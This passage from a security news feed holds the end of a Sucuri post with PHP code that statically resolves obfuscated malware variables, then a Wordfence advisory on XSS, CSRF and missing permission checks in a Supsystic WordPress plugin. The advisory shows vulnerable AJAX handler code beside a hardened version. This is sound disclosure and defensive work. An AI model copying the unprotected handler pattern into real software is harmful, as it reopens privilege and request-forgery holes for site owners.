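	foreach ( token_get_all( $code ) as $tok ) {
		if ( is_array( $tok ) ) {
			if ( in_array( $tok[0], array( T_COMMENT, T_DOC_COMMENT, T_WHITESPACE, T_OPEN_TAG ), true ) ) {
				continue;
			}
			$out[] = array( 'type' => $tok[0], 'text' => $tok[1] );
		} else {
			$out[] = array( 'type' => null, 'text' => $tok );
		}
	}
	return $out;
}

// Collect "$var = 'literal';" assignments into a name => value map.
function collect_string_literals( array $tokens ) {
	$map = array();
	for ( $i = 0; $i + 3 < count( $tokens ); $i++ ) {
		if ( T_VARIABLE === $tokens[ $i ]['type'] && '=' === $tokens[ $i + 1 ]['text']
			&& T_CONSTANT_ENCAPSED_STRING === $tokens[ $i + 2 ]['type'] && ';' === $tokens[ $i + 3 ]['text'] ) {
			$map[ $tokens[ $i ]['text'] ] = substr( $tokens[ $i + 2 ]['text'], 1, -1 );
		}
	}
	return $map;
}

// Find "$alias = ${ a . b . c };" and return alias => resolved variable name.
// Only string literals and variables already known to hold literals are resolved.
function resolve_variable_variables( array $tokens, array $literals ) {
	$aliases = array();
	$n       = count( $tokens );
	for ( $i = 0; $i + 3 < $n; $i++ ) {
		if ( T_VARIABLE !== $tokens[ $i ]['type'] || '=' !== $tokens[ $i + 1 ]['text']
			|| '$' !== $tokens[ $i + 2 ]['text'] || '{' !== $tokens[ $i + 3 ]['text'] ) {
			continue;
		}
		$name = '';
		for ( $k = $i + 4; $k < $n && '}' !== $tokens[ $k ]['text']; $k++ ) {
			if ( T_CONSTANT_ENCAPSED_STRING === $tokens[ $k ]['type'] ) {
				$name .= substr( $tokens[ $k ]['text'], 1, -1 );
			} elseif ( T_VARIABLE === $tokens[ $k ]['type'] && isset( $literals[ $tokens[ $k ]['text'] ] ) ) {
				$name .= $literals[ $tokens[ $k ]['text'] ];
			} elseif ( '.' !== $tokens[ $k ]['text'] ) {
				$name = null; // an operand we cannot resolve statically
				break;
			}
		}
		if ( null !== $name ) {
			$aliases[ $tokens[ $i ]['text'] ] = '$' . $name;
		}
	}
	return $aliases;
}

// For each resolved alias, list the string keys read from it ($j['Q'] => Q).
function keys_read_from( array $tokens, array $aliases ) {
	$keys = array();
	for ( $i = 0; $i + 3 < count( $tokens ); $i++ ) {
		$t = $tokens[ $i ];
		if ( T_VARIABLE === $t['type'] && isset( $aliases[ $t['text'] ] ) && '[' === $tokens[ $i + 1 ]['text']
			&& T_CONSTANT_ENCAPSED_STRING === $tokens[ $i + 2 ]['type'] && ']' === $tokens[ $i + 3 ]['text'] ) {
			$keys[ $aliases[ $t['text'] ] ][] = substr( $tokens[ $i + 2 ]['text'], 1, -1 );
		}
	}
	return array_map( 'array_unique', $keys );
}

$tokens   = significant_tokens( $sample );
$literals = collect_string_literals( $tokens );
$aliases  = resolve_variable_variables( $tokens, $literals );

foreach ( $aliases as $alias => $target ) {
	echo "$alias resolves to $target\n";
}
foreach ( keys_read_from( $tokens, $aliases ) as $target => $keys ) {
	echo "$target keys read: " . implode( ', ', $keys ) . "\n";
}
```

The design point is that the tokenizer does the work the comments were meant to frustrate: once T_COMMENT and T_WHITESPACE tokens are gone, the assignment and ${ … } patterns are a handful of adjacent tokens and can be matched directly. The same approach extends to other predefined variables assembled this way ($_POST, $_REQUEST, $_SERVER), since the resolver only depends on string literals being concatenated inside the braces.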

Continue reading Assemble the Cookies at Sucuri Blog.

Vulnerabilities Patched in the Data Tables Generator by Supsystic Plugin

A few weeks ago, we disclosed several flaws that were patched in the Pricing Table by Supsystic plugin. On January 20th, our Threat Intelligence team discovered several similar vulnerabilities present in another product from Supsystic: Data Tables Generator by Supsystic, a WordPress plugin installed on over 30,000 sites. These flaws were very similar and allowed an attacker to execute several AJAX actions, inject malicious JavaScript, and forge requests on behalf of an authenticated site user. However, in the Data Tables Generator plugin, these flaws required an attacker to be logged in as a user with subscriber or above permissions on a target site.

We privately disclosed these issues to the plugin’s author at the same time we fully disclosed the flaws discovered in Pricing Table by Supsystic; again, they released patches a little over a month later. We recommend updating to the latest version, 1.9.92, immediately.

Wordfence Premium users received a new firewall rule on January 21, 2020 to protect against exploits targeting these vulnerabilities. Free Wordfence users received this rule on February 20, 2020.


Description: Insecure Permissions on AJAX Actions
Affected Plugin: Data Tables Generator by Supsystic
Plugin Slug: data-tables-generator-by-supsystic
Affected Versions: <= 1.9.91
CVE ID: Post will be updated once assigned.
CVSS Score: 6.3 (Medium)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Patched Version: 1.9.92

Data Tables Generator by Supsystic is an easy-to-use responsive table, chart, and data management plugin. It has several features such as custom CSS, the ability to add iframes, different fonts and label capabilities, and more. Unfortunately, we discovered that all of the AJAX actions that provide these features lacked capability checks and WordPress nonces for CSRF (Cross-Site Request Forgery) protection.

<pre>
/**
 * Validate and creates the new table.
 * @param Rsc_Http_Request $request
 * @return Rsc_Http_Response
 */
public function createAction(Rsc_Http_Request $request)
{
    $title = trim($request->post->get('title'));
    $rowsCount = (int) $request->post->get('rows');
    $colsCount = (int) $request->post->get('cols');

    try {
        if (!$this->isValidTitle($title)) {
            return $this->ajaxError($this->translate('Title can\'t be empty or more than 255 characters'));
        }
        $this->getEnvironment()->getModule('tables')->setIniLimits();
        // Add base settings
        $tableId = $this->getModel('tables')->add(array('title' => $title, 'settings' => serialize(array())));

        if ($tableId) {
            $rows = array();

            for ($i = 0; $i < $rowsCount; $i++) {
                array_push($rows, array('cells' => array()));
                for ($j = 0; $j < $colsCount; $j++) {
                    array_push($rows[$i]['cells'], array(
                        'data' => '',
                        'calculatedValue' => '',
                        'hidden' => '',
                        'type' => 'text',
                        'formatType' => '',
                        'meta' => array()
                    ));
                }
            }
            // Save an empty table's rows to prevent error when the Data Tables script will be executed
            $this->getModel('tables')->setRows($tableId, $rows);
        }
    } catch (Exception $e) {
        return $this->ajaxError($e->getMessage());
    }

    return $this->ajaxSuccess(array('url' => $this->generateUrl('tables', 'view', array('id' => $tableId))));
}
</pre>

One example of a function triggered by the AJAX action create. No nonce or permission checks present.

WordPress AJAX actions can be processed by any authenticated user. As such, an AJAX action that is meant for administrators only should always perform an additional capability check to verify that the user sending the request actually is an administrator. Without that permission check, any user logged in as subscriber or above could execute the actions and make malicious changes to any given data table, or create a new data table. With many sites allowing open subscriber registration, protecting site functionality with capability checks is critical when utilizing AJAX actions.

The vulnerable endpoints we discovered were: getListForTbl, updateRows, updateMeta, saveSettings, remove, create, render, getSettings, getMeta, getCountRows, getRows, clone, and rename. The most impactful endpoints were rename, where an attacker could rename any given data table; getListForTbl, where an attacker could discover all of the existing tables and use that information to craft a request; saveSettings, where an attacker could maliciously modify any data table's settings; and create, where an attacker could create a new data table with any options set.


Description: Authenticated Stored XSS
Affected Plugin: Data Tables Generator by Supsystic
Affected Versions: <= 1.9.91
CVE ID: Post will be updated once assigned.
CVSS Score: 5.4 (Medium)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Patched Version: 1.9.92

As an extension of the previous vulnerability, we discovered that malicious JavaScript could be injected into many data table fields, including the title, the data table cells, the description and caption, and more, by using the saveSettings endpoint to update an existing data table.

The malicious JavaScript would then execute in a site visitor's browser whenever they accessed a page containing the data table. This could ultimately lead to malicious site redirection, new administrative user account creation, and other malicious actions.

As previously mentioned with the Pricing Table by Supsystic plugin, WordPress grants administrators the unfiltered_html capability by default. On its own, that would not be considered a security risk if only administrative users had access to modify these settings. However, combining the unfiltered_html capability with AJAX actions that allowed even subscriber-level users to modify these settings introduced a cross-site scripting (XSS) vulnerability.


Description: CSRF to Stored XSS, Data Table Creations, Settings Modification
Affected Plugin: Data Tables Generator by Supsystic
Plugin Slug: data-tables-generator-by-supsystic
Affected Versions: <= 1.9.91
CVE ID: Post will be updated once assigned.
CVSS Score: 8.8 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Patched Version: 1.9.92

The lack of WordPress nonces for CSRF protection on all actions registered in this plugin also resulted in several Cross-Site Request Forgery (CSRF) vulnerabilities. Given that the registered actions could be executed by any logged-in user regardless of privilege level, CSRF exploit attempts could be targeted towards any user, even those with just a subscriber role.

If an attacker was able to trick any authenticated user into clicking on a link or opening a malicious attachment, a forged request could be sent on behalf of that user to modify any given data table and inject malicious JavaScript. Again, the malicious JavaScript could add a new administrative user, redirect site visitors to a malicious site, and more.

It is important to remember not to click on links in comments or emails unless you can verify the authenticity of the source and the destination to protect against a CSRF exploit attempt. It is difficult for firewalls to protect against CSRF attacks because the malicious request appears to come from a valid, authenticated user.
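The two root causes described above, the missing capability check in the insecure permissions section and the missing nonce in this CSRF section, are closed by two lines at the top of each handler. The following is an added example written against the plain WordPress API, not the plugin's own code (the plugin uses its own Rsc_ request layer); the action name dtg_create, the nonce name dtg_admin, the table name and the dtg_store_table() helper are all made up for illustration.

```php
<?php
// Added example, not the plugin's code: a "create table" AJAX action written
// against the plain WordPress API, first with the checks the post found
// missing and then hardened. Action, nonce and table names are invented here.

// Vulnerable shape: wp_ajax_* handlers run for ANY logged-in user, and nothing
// here verifies a nonce or a capability, so a subscriber (or a CSRF page acting
// as one) can create a table with attacker-chosen content.
add_action('wp_ajax_dtg_create_unsafe', function () {
    $title = trim($_POST['title'] ?? '');
    $id = dtg_store_table($title, (int) ($_POST['rows'] ?? 0), (int) ($_POST['cols'] ?? 0));
    wp_send_json_success(['id' => $id]);
});

// Hardened shape: nonce first (stops CSRF), then capability (stops the
// privilege problem), then sanitise what is stored so it cannot carry script.
add_action('wp_ajax_dtg_create', function () {
    check_ajax_referer('dtg_admin', 'nonce');          // dies with -1 on a bad or missing nonce
    if (!current_user_can('manage_options')) {        // administrators only; subscribers stop here
        wp_send_json_error('insufficient permissions', 403);
    }
    $title = sanitize_text_field(wp_unslash($_POST['title'] ?? ''));
    if ($title === '' || mb_strlen($title) > 255) {
        wp_send_json_error('Title can\'t be empty or more than 255 characters');
    }
    $id = dtg_store_table($title, absint($_POST['rows'] ?? 0), absint($_POST['cols'] ?? 0));
    wp_send_json_success(['id' => $id]);
});

// Hand the nonce to the admin page's script; the browser must echo it back as
// the "nonce" POST field, which a third-party page cannot read or forge.
add_action('admin_enqueue_scripts', function () {
    wp_enqueue_script('dtg-admin', plugins_url('admin.js', __FILE__), ['jquery'], '1.0', true);
    wp_localize_script('dtg-admin', 'dtgAjax', [
        'url'   => admin_url('admin-ajax.php'),
        'nonce' => wp_create_nonce('dtg_admin'),
    ]);
});

// Hypothetical stand-in for the plugin's table model. Stored titles must still
// be passed through esc_html() wherever they are rendered on the front end.
function dtg_store_table(string $title, int $rows, int $cols): int
{
    global $wpdb;
    $wpdb->insert($wpdb->prefix . 'dtg_tables', ['title' => $title, 'rows' => $rows, 'cols' => $cols]);
    return (int) $wpdb->insert_id;
}
```

The order matters: check_ajax_referer() runs before any state change, so a forged request from a logged-in subscriber or administrator never reaches the capability test, let alone the database write.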

Disclosure Timeline

January 20, 2020 – Vulnerability initially discovered and analyzed. We begin working on firewall rules.
January 21, 2020 – Firewall rule released for Wordfence Premium users. Awaiting response from Supsystic's plugin team in regards to vulnerabilities in Pricing Table by Supsystic.
January 21, 2020 – Plugin team confirms appropriate inbox for handling discussion. Full disclosure of vulnerabilities is sent.
January 30, 2020 – Follow-up with plugin team as no response from disclosure.
February 11, 2020 – Plugin developer acknowledges report.
February 20, 2020 – Wordfence free users receive firewall rule.
February 21, 2020 – Additional and final follow-up. Insufficient patch released.
February 21 to March 23, 2020 – Back and forth with the plugin team to ensure an optimal solution released.
March 23, 2020 – Final patch released.

Conclusion

In today’s post, we detailed several vulnerabilities including stored XSS, CSRF, and insecure permissions found in the Data Tables Generator by Supsystic plugin. These flaws have been fully patched in version 1.9.92, and we recommend that users update to the latest version available immediately. Sites running Wordfence Premium have been protected from attacks against these vulnerabilities since January 21, 2020. Sites running the free version of Wordfence received the firewall rule update on February 20, 2020.

The post Vulnerabilities Patched in the Data Tables Generator by Supsystic Plugin appeared first on Wordfence.

Tips for New Remote Workers

With the new pandemic hovering over our heads, the main piece of advice from most countries is stay home. Working remotely is a new reality for many people around the world, and Sucuri can help you make this new endeavor easier for you. We have been an entirely remote team since the creation of the company, more than 10 years ago.

Working from home has its perks and challenges. We asked our colleagues what recommendations they had for people who are starting to work from home as well as some advice to mitigate cybersecurity risks.

Continue reading Tips for New Remote Workers at Sucuri Blog.
